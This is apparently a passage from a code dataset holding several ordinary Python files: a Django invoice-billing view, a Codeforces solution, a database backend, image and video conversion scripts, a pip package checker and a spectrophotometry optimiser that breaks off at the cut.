client.tax_exempt:\n client_tax_rules = TaxRule.for_country_and_state(\n country=client.country_name,\n state=client.state\n )\n if client_tax_rules:\n for tax_rule in client_tax_rules:\n tax_amount = (credit * tax_rule.rate) / 100\n tax_amount = utils.cdecimal(tax_amount, q='.01')\n item_taxes.append({'name': tax_rule.name,\n 'amount': tax_amount,\n 'tax_rule': tax_rule.id})\n invoice_id = tasks.invoice_create(\n client.pk,\n items=[{\n 'item_type': BillingItemTypes.credit,\n 'amount': credit,\n 'description': item_description_msg,\n 'taxed': True if len(item_taxes) else False,\n 'taxes': item_taxes,\n }],\n currency=client.currency.code,\n issue_date=now().isoformat(),\n due_date=now().isoformat()\n )\n return Response({'id': invoice_id})\n\n @action(detail=True, methods=['GET'])\n def payment_options(self, request, pk):\n invoice = self.get_object()\n return Response(get_invoice_payment_options(invoice=invoice))\n\n @action(detail=True, methods=['POST'])\n def pay_from_credit_balance(self, request, pk):\n invoice = 
self.get_object()\n if invoice.is_credit_invoice():\n # NOTE(tomo): do not allow payment from credit balance if this is a credit invoice\n return Response({'detail': _('Unable to pay a credit invoice with credit')}, status=HTTP_409_CONFLICT)\n if not invoice.is_unpaid():\n # NOTE(tomo): only unpaid invoices should be allowed\n return Response({'detail': _('Only unpaid invoices can be paid from credit')}, status=HTTP_409_CONFLICT)\n\n invoice_has_default_currency = True if invoice.currency.code == get_default_currency().code else False\n if not invoice_has_default_currency:\n try:\n credit_balance = invoice.client.credits.get(currency=invoice.currency).amount\n except ClientCredit.DoesNotExist as e:\n LOG.error(e)\n credit_balance = 0\n else:\n credit_balance = invoice.client.uptodate_credit\n if credit_balance <= 0:\n return Response({'detail': _('Not enough credit')}, status=HTTP_409_CONFLICT)\n\n invoice_balance = invoice.balance\n # don't allow payment if the remaining credit (only for up to date credit in default currency) will be less\n # than the minimum specified in client's configuration after paying the invoice\n if invoice_has_default_currency:\n min_credit_to_be_left = invoice.client.billing_settings.minim_uptodate_credit_for_invoice_payment\n not_enough_credit_response = Response(\n data={'detail': _('You should have at least {} {} credit left after making a payment')\n .format(min_credit_to_be_left, invoice.client.currency)},\n status=HTTP_409_CONFLICT\n )\n if credit_balance >= invoice_balance:\n if credit_balance - invoice_balance < min_credit_to_be_left:\n return not_enough_credit_response\n elif min_credit_to_be_left > 0:\n return not_enough_credit_response\n\n amount = 0\n\n if invoice_balance >= credit_balance > 0:\n amount = credit_balance\n elif credit_balance > invoice_balance > 0:\n amount = invoice_balance\n\n currency_code = invoice.client.currency.code\n tasks.invoice_add_payment.delay(\n invoice.id,\n amount=amount,\n currency_code=currency_code,\n from_credit_balance=True,\n user_id=request.user.pk,\n create_todo=invoice.client.billing_settings.create_todo_on_invoice_payment,\n )\n\n return Response({'detail': _('Adding {} {} to invoice'.format(amount, currency_code))},\n status=HTTP_202_ACCEPTED)\n\n @action(detail=True, methods=['GET'])\n def download(self, request, pk):\n invoice = self.get_object()\n invoice_number = str(invoice.display_number).strip()\n invoice_file_name = 'invoice_{}.pdf'.format(invoice_number.replace(' ', '_'))\n response = HttpResponse()\n response['Content-Type'] = 'application/pdf'\n response['Content-Disposition'] = 'attachment; filename=\"{}\"'.format(invoice_file_name)\n pdf_file = BytesIO()\n # Add invoice taxes and total/subtotal\n invoice_totals = [{'name': _('Subtotal ({})').format(invoice.currency), 'value': invoice.subtotal}]\n for tax in invoice.taxes:\n invoice_totals.append({'name': tax.get('name'), 'value': tax.get('amount')})\n invoice_totals.append({'name': _('Total ({})').format(invoice.currency), 'value': invoice.total})\n\n # NOTE(tomo): text on invoice can also be customise using the para tag\n # Ex: invoice_status = '{}'.format(invoice_status)\n # See the reportlab userguide for a full list of tag attributes\n try:\n try:\n customer_invoice_details_getter = import_string(getattr(settings, 'INVOICE_CUSTOMER_DETAILS_GETTER'))\n except ImportError:\n customer_details = None\n else:\n customer_details = customer_invoice_details_getter(invoice)\n invoice_statuses_dict = dict((key, translated) for key, translated in 
InvoiceStatus.PAYMENT_STATUSES)\n if invoice.is_fiscal:\n invoice_issue_date = invoice.fiscal_date.date() if invoice.fiscal_date else None\n invoice_due_date = invoice.fiscal_due_date.date() if invoice.fiscal_due_date else None\n else:\n invoice_issue_date = invoice.issue_date.date() if invoice.issue_date else None\n invoice_due_date = invoice.due_date.date() if invoice.due_date else None\n\n pdf_invoice(pdf_file=pdf_file,\n invoice_display_number=invoice.name,\n invoice_status=invoice_statuses_dict[invoice.status],\n invoice_issue_date=invoice_issue_date,\n invoice_due_date=invoice_due_date,\n customer_details=customer_details if customer_details else invoice.client.long_name,\n company_details=invoice.client.billing_settings.company_info,\n invoice_items=[{'description': item.description,\n 'quantity': 1,\n 'unit_price': item.amount,\n 'cost': item.amount,\n 'options': [{'quantity': opt.quantity,\n 'unit_price': opt.unit_price,\n 'price': opt.price,\n 'display': opt.display} for opt in item.configurable_options.all()]\n } for item in invoice.items.all()],\n invoice_totals=invoice_totals,\n invoice_currency=invoice.currency.code,\n invoice_lang=request.user.language if request.user.language else 'en')\n except Exception as e:\n LOG.exception(e)\n return Response(status=500, data={'details': 'Unable to download invoice'})\n else:\n response.write(pdf_file.getvalue())\n pdf_file.close()\n return response\n", "repo_name": "pizzhub/backendfleio-test", "sub_path": "project/fleio/billing/invoicing/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 11076, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 42, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 42, "usage_type": "name"}, {"api_name": "fleio.billing.models.Invoice", "line_number": 43, "usage_type": "name"}, {"api_name": "fleio.core.drf.EndUserOnly", "line_number": 44, "usage_type": "name"}, {"api_name": "rest_framework.filters.OrderingFilter", "line_number": 45, "usage_type": "attribute"}, {"api_name": "rest_framework.filters", "line_number": 45, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.DjangoFilterBackend", "line_number": 45, "usage_type": "name"}, {"api_name": "fleio.core.filters.CustomFilter", "line_number": 45, "usage_type": "name"}, {"api_name": "rest_framework.filters.SearchFilter", "line_number": 45, "usage_type": "attribute"}, {"api_name": "fleio.billing.models.Invoice.objects.filter", "line_number": 52, "usage_type": "call"}, {"api_name": "fleio.billing.models.Invoice.objects", "line_number": 52, "usage_type": "attribute"}, {"api_name": "fleio.billing.models.Invoice", "line_number": 52, "usage_type": "name"}, {"api_name": "serializers.InvoiceDetailSerializer", "line_number": 56, "usage_type": "name"}, {"api_name": "serializers.InvoiceBriefSerializer", "line_number": 58, "usage_type": "name"}, {"api_name": "fleio.billing.serializers.AddCreditSerializer", "line_number": 62, "usage_type": "call"}, {"api_name": "fleio.core.models.Client.DoesNotExist", "line_number": 66, "usage_type": "attribute"}, {"api_name": "fleio.core.models.Client", "line_number": 66, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 67, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", 
"line_number": 67, "usage_type": "call"}, {"api_name": "fleio.billing.models.Invoice.objects.filter", "line_number": 70, "usage_type": "call"}, {"api_name": "fleio.billing.models.Invoice.objects", "line_number": 70, "usage_type": "attribute"}, {"api_name": "fleio.billing.models.Invoice", "line_number": 70, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 72, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 72, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 73, "usage_type": "call"}, {"api_name": "fleio.billing.models.TaxRule.for_country_and_state", "line_number": 76, "usage_type": "call"}, {"api_name": "fleio.billing.models.TaxRule", "line_number": 76, "usage_type": "name"}, {"api_name": "fleio.billing.utils.cdecimal", "line_number": 83, "usage_type": "call"}, {"api_name": "fleio.billing.utils", "line_number": 83, "usage_type": "name"}, {"api_name": "fleio.billing.invoicing.tasks.invoice_create", "line_number": 87, "usage_type": "call"}, {"api_name": "fleio.billing.invoicing.tasks", "line_number": 87, "usage_type": "name"}, {"api_name": "fleio.billing.settings.BillingItemTypes.credit", "line_number": 90, "usage_type": "attribute"}, {"api_name": "fleio.billing.settings.BillingItemTypes", "line_number": 90, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 97, "usage_type": "call"}, {"api_name": "django.utils.timezone.now", "line_number": 98, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 100, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 60, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 105, "usage_type": "call"}, {"api_name": "fleio.billing.operations.get_invoice_payment_options", "line_number": 105, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 102, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 112, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 112, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_409_CONFLICT", "line_number": 112, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 115, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 115, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_409_CONFLICT", "line_number": 115, "usage_type": "name"}, {"api_name": "fleio.core.models.get_default_currency", "line_number": 117, "usage_type": "call"}, {"api_name": "fleio.billing.models.ClientCredit.DoesNotExist", "line_number": 121, "usage_type": "attribute"}, {"api_name": "fleio.billing.models.ClientCredit", "line_number": 121, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 127, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 127, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_409_CONFLICT", "line_number": 127, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 134, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 135, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_409_CONFLICT", "line_number": 137, "usage_type": "name"}, {"api_name": 
"fleio.billing.invoicing.tasks.invoice_add_payment.delay", "line_number": 153, "usage_type": "call"}, {"api_name": "fleio.billing.invoicing.tasks.invoice_add_payment", "line_number": 153, "usage_type": "attribute"}, {"api_name": "fleio.billing.invoicing.tasks", "line_number": 153, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 162, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 162, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_202_ACCEPTED", "line_number": 163, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 107, "usage_type": "call"}, {"api_name": "django.http.HttpResponse", "line_number": 170, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 173, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 175, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 178, "usage_type": "call"}, {"api_name": "django.utils.module_loading.import_string", "line_number": 185, "usage_type": "call"}, {"api_name": "django.conf.settings", "line_number": 185, "usage_type": "argument"}, {"api_name": "fleio.billing.models.invoice.InvoiceStatus.PAYMENT_STATUSES", "line_number": 190, "usage_type": "attribute"}, {"api_name": "fleio.billing.models.invoice.InvoiceStatus", "line_number": 190, "usage_type": "name"}, {"api_name": "fleio.billing.invoicing.pdf.pdf_invoice", "line_number": 198, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 219, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 165, "usage_type": "call"}, {"api_name": "fleio.activitylog.utils.decorators.log_enduser_activity", "line_number": 36, "usage_type": "call"}, {"api_name": "django.utils.translation.ugettext_lazy", "line_number": 39, "usage_type": "call"}]} +{"seq_id": "72878919528", "text": "# link : https://codeforces.com/problemset/problem/1728/C\n# author : Mohamed Ibrahim\n\n\n\n\nfrom collections import Counter\nfor _ in range(int(input())):\n use=input()\n axe=Counter(input().split())\n axe.subtract(Counter(input().split()))\n ans=0\n for key in list(axe.keys()):\n if len(key) > 1:\n ans += abs(axe[key])\n axe[str(len(key))] += axe[key]\n axe[key] = 0\n print(ans+(sum(axe[key] for key in axe.keys() if axe[key] > 0) * 2) - abs((axe[\"1\"])))\n \n \n \n", "repo_name": "M0hamedIbrahim1/Problem-Solving-Python-", "sub_path": "Data Structure Problems/C. Digital Logarithm.py", "file_name": "C. Digital Logarithm.py", "file_ext": "py", "file_size_in_byte": 520, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 10, "dataset": "github-code", "pt": "53", "api": [{"api_name": "collections.Counter", "line_number": 10, "usage_type": "call"}, {"api_name": "collections.Counter", "line_number": 11, "usage_type": "call"}]} +{"seq_id": "2402768565", "text": "\"\"\"\n\n.. module:: django-ewiz.base\n :synopsis: django-ewiz database backend base.\n\n django-ewiz is free software: you can redistribute it and/or modify\n it under the terms of the GNU Lesser Public License as published by\n the Free Software Foundation, either version 3 of the License, or\n (at your option) any later version.\n\n django-ewiz is distributed in the hope that it will be useful,\n but WITHOUT ANY WARRANTY; without even the implied warranty of\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n GNU Lesser Public License for more details.\n\n You should have received a copy of the GNU Lesser Public License\n along with django-ewiz. If not, see .\n\n.. moduleauthor:: Alex Kavanaugh \n\n\"\"\"\n\nimport logging\n\nfrom djangotoolbox.db.base import (NonrelDatabaseFeatures, NonrelDatabaseOperations, NonrelDatabaseWrapper, NonrelDatabaseClient,\n NonrelDatabaseValidation, NonrelDatabaseIntrospection, NonrelDatabaseCreation)\n\n\nlogging.getLogger(\"django_ewiz\")\n\n\nclass DatabaseOperations(NonrelDatabaseOperations):\n compiler_module = __name__.rsplit('.', 1)[0] + '.compiler'\n\n\nclass DatabaseWrapper(NonrelDatabaseWrapper):\n operators = {\n 'exact': \"= '%s'\",\n 'iexact': \"= '%s'\",\n 'contains': \"LIKE '%%25%s%%25'\",\n 'icontains': \"LIKE '%%25%s%%25'\",\n 'gt': \"> '%s'\",\n 'gte': \">= '%s'\",\n 'lt': \"< '%s'\",\n 'lte': \"<= '%s'\",\n 'startswith': \"LIKE '%s%%25'\",\n 'endswith': \"LIKE '%%25%s'\",\n 'istartswith': \"LIKE '%s%%25'\",\n 'iendswith': \"LIKE '%%25%s'\",\n 'in': \"IN (%s)\",\n 'range': \"BETWEEN AND(%s)\",\n 'year': \"BETWEEN AND(%s)\",\n 'isnull': \"IS NULL\",\n }\n\n def __init__(self, *args, **kwargs):\n super(DatabaseWrapper, self).__init__(*args, **kwargs)\n\n self.server_version = None\n self.features = NonrelDatabaseFeatures(self)\n self.ops = DatabaseOperations(self)\n self.client = NonrelDatabaseClient(self)\n self.creation = NonrelDatabaseCreation(self)\n self.introspection = NonrelDatabaseIntrospection(self)\n self.validation = NonrelDatabaseValidation(self)\n", "repo_name": "kavdev/django-ewiz", "sub_path": "django_ewiz/base.py", "file_name": "base.py", "file_ext": "py", "file_size_in_byte": 2266, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 29, "usage_type": "call"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseOperations", "line_number": 32, "usage_type": "name"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseWrapper", "line_number": 36, "usage_type": "name"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseFeatures", "line_number": 60, "usage_type": "call"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseClient", "line_number": 62, "usage_type": "call"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseCreation", "line_number": 63, "usage_type": "call"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseIntrospection", "line_number": 64, "usage_type": "call"}, {"api_name": "djangotoolbox.db.base.NonrelDatabaseValidation", "line_number": 65, "usage_type": "call"}]} +{"seq_id": "37220993279", "text": "from pathlib import Path\n\nimport cv2\n\nif __name__ == \"__main__\":\n \"\"\"\n Convert movie file in jpeg files.\n \"\"\"\n import argparse\n parser = argparse.ArgumentParser(description=\"jpg2mp4 converter\")\n parser.add_argument(\"movie_file\", help=\"movie file(.mp4, .avi, .webm) to jpgs \")\n args = parser.parse_args()\n\n movie_file = Path(args.movie_file)\n assert movie_file.suffix in (\".mp4\", \".avi\", \".webm\")\n cap = cv2.VideoCapture(str(movie_file))\n\n outdir = Path.home() / f\"{movie_file.stem}\"\n outdir.mkdir(exist_ok=True)\n counter = -1\n while True:\n ret, cvimg = cap.read()\n if cvimg is None:\n break\n counter += 1\n oname = outdir / f\"{movie_file.stem}_{counter:04d}.jpg\"\n cv2.imwrite(str(oname), cvimg)\n print(f\"saved to {outdir}\")\n", "repo_name": "waragai-katsunori/jpg2mp4", "sub_path": "scripts/mp4_tojpg.py", "file_name": "mp4_tojpg.py", "file_ext": "py", 
"file_size_in_byte": 813, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}, {"api_name": "cv2.VideoCapture", "line_number": 16, "usage_type": "call"}, {"api_name": "pathlib.Path.home", "line_number": 18, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 18, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "33184441189", "text": "from PIL import Image, ImageOps\nimport os\nimport cv2\nimport numpy as np\n\n#im_pth = '../test_imgs/skoda2.jpg'\n\n#/Desktop/InteliGate/CLASSIFICATION/VMMR/google_imgs/downloads\ndef resize_black(desired_size, im_pth, overwrite = False, print_oldsize=True):\n im = Image.open(im_pth)\n old_size = im.size # old_size[0] is in (width, height) format\n if print_oldsize:\n print(old_size)\n ratio = float(desired_size)/max(old_size)\n new_size = tuple([int(x*ratio) for x in old_size])\n # use thumbnail() or resize() method to resize the input image\n # thumbnail is a in-place operation\n # im.thumbnail(new_size, Image.ANTIALIAS)\n im = im.resize(new_size, Image.ANTIALIAS)\n # create a new image and paste the resized on it\n new_im = Image.new(\"RGB\", (desired_size, desired_size))\n new_im.paste(im, ((desired_size-new_size[0])//2,\n (desired_size-new_size[1])//2))\n if overwrite:\n new_im.save(im_pth)\n return new_im, im_pth\n\n\n\ndef resize_white(im_pth, width, height, overwrite = False, print_oldsize=True):\n '''\n Resize PIL image keeping ratio and using white background.\n '''\n image_pil = Image.open(im_pth)\n if print_oldsize:\n print(image_pil.size)\n ratio_w = width / image_pil.width\n ratio_h = height / image_pil.height\n if ratio_w < ratio_h:\n # It must be fixed by width\n resize_width = width\n resize_height = round(ratio_w * image_pil.height)\n else:\n # Fixed by height\n resize_width = round(ratio_h * image_pil.width)\n resize_height = height\n image_resize = image_pil.resize((resize_width, resize_height), Image.ANTIALIAS)\n background = Image.new('RGBA', (width, height), (255, 255, 255, 255))\n offset = (round((width - resize_width) / 2), round((height - resize_height) / 2))\n background.paste(image_resize, offset)\n new_im = background.convert('RGB')\n if overwrite:\n new_im.save(im_pth)\n return new_im, im_pth\n\ndef resize_expand_background(im_pth, width, height, overwrite = False, print_oldsize=True):\n '''\n Resize PIL image keeping ratio and using white background.\n '''\n image_pil = Image.open(im_pth)\n if print_oldsize:\n print(image_pil.size)\n ratio_w = width / image_pil.width\n ratio_h = height / image_pil.height\n if ratio_w < ratio_h:\n # It must be fixed by width\n resize_width = width\n resize_height = round(ratio_w * image_pil.height)\n else:\n # Fixed by height\n resize_width = round(ratio_h * image_pil.width)\n resize_height = height\n image_resize = image_pil.resize((resize_width, resize_height), Image.ANTIALIAS)\n #background = Image.new('RGBA', (width, height), (255, 255, 255, 255))\n background = image_pil.resize((width, height))\n offset = (round((width - resize_width) / 2), round((height - resize_height) / 2))\n background.paste(image_resize, offset)\n new_im = background.convert('RGB')\n #figure2 = imshow(new_im)\n if overwrite:\n new_im.save(im_pth)\n return new_im, im_pth\n\ndef color_to_3_channels(img_path, overwrite=False):\n img = 
cv2.imread(img_path)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n img2 = np.zeros_like(img)\n img2[:,:,0] = gray\n img2[:,:,1] = gray\n img2[:,:,2] = gray\n# imshow(img2)\n# print(np.asarray(img2).shape)\n if overwrite:\n cv2.imwrite(img_path, img2)\n return img2, img_path\n\n# if __name__ == \"__main__\":\n# resize('../test_imgs/forg.png', 299, 299, overwrite = True)\n\nif __name__ == \"__main__\":\n if (os.getcwd() == '/home/kalkami/translearn' or os.getcwd() == '/home/kalkami/translearn_cpu'):\n #lhcpgpu1\n TRAIN_DIR = '/data/IntelliGate/kalkami/DATASETS/carsStanford_all/train'\n TEST_DIR = '/data/IntelliGate/kalkami/DATASETS/carsStanford_all/test'\n else:\n #local\n TRAIN_DIR = '/media/kamila/System/Users/Kama/Documents/DATASETS/carsStanford_all_bw/train'\n TEST_DIR = '/media/kamila/System/Users/Kama/Documents/DATASETS/carsStanford_all_bw/test'\n #folder = '../google_imgs/downloads'\n folders = [TRAIN_DIR, TEST_DIR]\n width = 299\n height = 299\n for folder in folders:\n for subfol in os.scandir(folder):\n for img in os.scandir(subfol):\n if os.path.isfile(img):\n print(img.name)\n #new_im, im_pth = resize_expand_background(os.path.abspath(img), width, height, overwrite=True)\n #color_to_3_channels(im_pth, overwrite=True)\n color_to_3_channels(os.path.abspath(img), overwrite=True)\n #resize_to_square(desired_size, os.path.abspath(img), overwrite=True)\n #resize_to_square(desired_size, im_pth)", "repo_name": "kaamka/cars-classification-deep-learning", "sub_path": "data_preprocessing.py", "file_name": "data_preprocessing.py", "file_ext": "py", "file_size_in_byte": 4764, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 12, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.Image.open", "line_number": 10, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 10, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 19, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 19, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 21, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 21, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 34, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 34, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 47, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 47, "usage_type": "name"}, {"api_name": "PIL.Image.new", "line_number": 48, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 48, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 60, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 60, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 73, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 73, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 85, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 86, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 86, "usage_type": "attribute"}, {"api_name": "numpy.zeros_like", "line_number": 87, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 94, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 101, "usage_type": "call"}, {"api_name": "os.scandir", "line_number": 114, "usage_type": "call"}, {"api_name": "os.scandir", "line_number": 115, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", 
"line_number": 116, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 120, "usage_type": "call"}, {"api_name": "os.path", "line_number": 120, "usage_type": "attribute"}]} +{"seq_id": "35064315409", "text": "import logging\nimport subprocess\n\nlogger = logging.getLogger('logger')\nlogger.setLevel(logging.INFO)\nconsole = logging.StreamHandler()\nlogger.addHandler(console)\n\n\ndef main():\n try:\n pip_list = subprocess.check_output(\n [\"pip\", \"list\", \"--format=freeze\"])\n except Exception as e:\n logger.error(\"%s\", e)\n return\n stdout_lines = pip_list.decode().split(\"\\n\")\n if not stdout_lines:\n logger.error(\"`pip list --format=freeze` output is empty\")\n return\n\n installed_packages = set()\n for line in stdout_lines:\n p = line.split(\"==\")\n if p and p[0].strip():\n installed_packages.add(p[0].strip())\n\n with open('malicious_packages.txt', 'r') as f:\n malicious_packages = set(x.strip() for x in f.read().splitlines())\n detected_packages = installed_packages.intersection(malicious_packages)\n if detected_packages:\n logger.warning(\n \"%d malicious pip package%s from `malicious_packages.txt`\"\n \" detected in `pip list --format=freeze` output\"\n \"\\nThe packages are\\n%s\", len(detected_packages),\n \"s\" if len(detected_packages) > 1 else \"\", sorted(detected_packages))\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "elliotwutingfeng/check-pip", "sub_path": "check.py", "file_name": "check.py", "file_ext": "py", "file_size_in_byte": 1273, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "logging.getLogger", "line_number": 4, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 5, "usage_type": "attribute"}, {"api_name": "logging.StreamHandler", "line_number": 6, "usage_type": "call"}, {"api_name": "subprocess.check_output", "line_number": 12, "usage_type": "call"}]} +{"seq_id": "23247538154", "text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nSpectrophotometry program used for our mystery mixture lab in AP Chem.\n\nDesigned to work with CSV exports from Vernier's Graphical Analysis program. Required inputs are\na spectrophotogram for the unknown mystery mixture, pure yellow, pure red, and pure blue, and the \nratio of yellow, red, and blue in the mixture will be output. 
Input data sets must all have the same \nwavelengths as dependent variables, as the program does not account for possible misalignments.\n\nRun it from the command line as `python spectrophotometry.py data_file.csv`.\n\nDependencies\n------------\n- `Python 3`, written with 3.7.6, but should be compatible with older Python 3 versions.\n- `pandas` library for data analysis\n- `optimize` submodule of the `scipy` library\n- `List` submodule of the `typing` library\n'''\n\nimport sys # system library, used to read in arguments, as this is a command line app\nfrom typing import List # adds gradual typing support for List, IMO this should really be\n# part of the programming language itself, like primitive typing is\nimport pandas as pd # pandas library, allows manipulation of data in a table-like format\n# science library, this subpackage contains the LM-BFGS-B implementation used\nfrom scipy import optimize\n\n# Parse the -h flag, which stands for \"help\"\nif '-h' in sys.argv:\n print('\\n\\033[1;37mspectrophotometry.py by Michael Noguera\\033[0m')\n print('\\n\\tFinds the ratio of the components in a color mixture based on their spectrophotograms, ')\n print('\\tbased on the LM-BFGS-B algorithm for optimizing a multi-variable system.')\n print('\\n\\033[4;37mUsage:\\033[0m')\n print('\\t`python spectrophotometry.py data_file.csv`')\n print('\\n\\tThe csv file should be in the format exported from the Vernier Spectral Analysis app.')\n print('\\n\\033[4;37mOptions:\\033[0m')\n print('\\t-h \\tdisplays this message and exits\\n')\n quit()\n\n# Read the file path provided by the user\nfilepath: str = sys.argv[1]\n\n# Load the file at that location\ndf: pd.DataFrame = pd.read_csv(filepath)\n\n###\n# PARSE CSV DATA\n###\n\n# Rename first wavelength column, this one will be saved\ndf.rename(columns={df.columns[0]: \"Wavelength\"}, inplace=True)\n\n# Delete redundant wavelength columns\ndf.drop(list(df.filter(regex='\\:Wavelength\\(nm\\)')), axis=1, inplace=True)\n\n# Remove all \":Absorbance\" suffixes from column names\ndf.rename(columns=lambda s: s.replace(\n \":Absorbance\", \"\").strip(), inplace=True)\n\n# Try to automatically match columns with their contents\nfor column in df.columns:\n if \"red\" in column.lower():\n df.rename(columns={column: \"Red\"}, inplace=True)\n if \"blue\" in column.lower():\n df.rename(columns={column: \"Blue\"}, inplace=True)\n if \"yellow\" in column.lower():\n df.rename(columns={column: \"Yellow\"}, inplace=True)\n if \"mystery\" in column.lower():\n df.rename(columns={column: \"Experimental\"}, inplace=True)\n\n# Match up missing columns\nfor column in [\"Red\", \"Blue\", \"Yellow\", \"Experimental\"]:\n if not column in df.columns: # a column is missing, make the user match it up\n print(\"These are your solutions. 
Please match the missing column by entering it's corresponding number.\")\n print('\\n'.join('{}: {}'.format(*k)\n for k in enumerate(df.columns[1:], 1))) # print out columns in a pretty way\n df.rename(\n columns={df.columns[int(input(column+\" = \").strip())]: column}, inplace=True) # rename descriptively based on user input\n print(\"\\n\")\n\n# Put columns in order\ndf = df[[\"Wavelength\", \"Yellow\", \"Red\", \"Blue\", \"Experimental\"]]\n\n# Output table preview to the user\nprint(df.head())\nprint(\"...\")\n\n###\n# Optimization routine\n###\n\n# Adjust for stock concentration being not equal to one unit per volume\nstock_concentration: float = 12.00 # constant for stock solution concentration\ndf[['Yellow', 'Red', 'Blue']] = df[['Yellow', 'Red', 'Blue']].div(\n stock_concentration) # divide all data values by stock sample concentration\n\n# Optimize for best solution\ndef error(yrb: List[float]) -> float:\n ''' Function that calculates the total error for a given concentration combination.\n\n Arguments:\n yrb: List[float] -- A list containing the concentrations of [yellow, red, blue] in that order.\n\n Returns: the total least-squares error for that combination across all included wavelengths.\n '''\n ret: float = 0\n for (index, row) in df.iterrows():\n ret += ((row['Yellow']*yrb[0])+(row['Red']*yrb[1]) +\n (row['Blue']*yrb[2])-row['Experimental'])**2\n return ret\n\nresult: optimize.OptimizeResult = optimize.minimize(\n fun=error, x0=[2, 2, 2], bounds=[(0, 12), (0, 12), (0, 12)], method='L-BFGS-B')\n\n# Output solution to user\nprint(\"\\nSOLUTION FOUND (and pun intended)\")\nprint(\"\\033[1;33m\"+str(round(dict(result.items())['x'][0], 3)) +\n 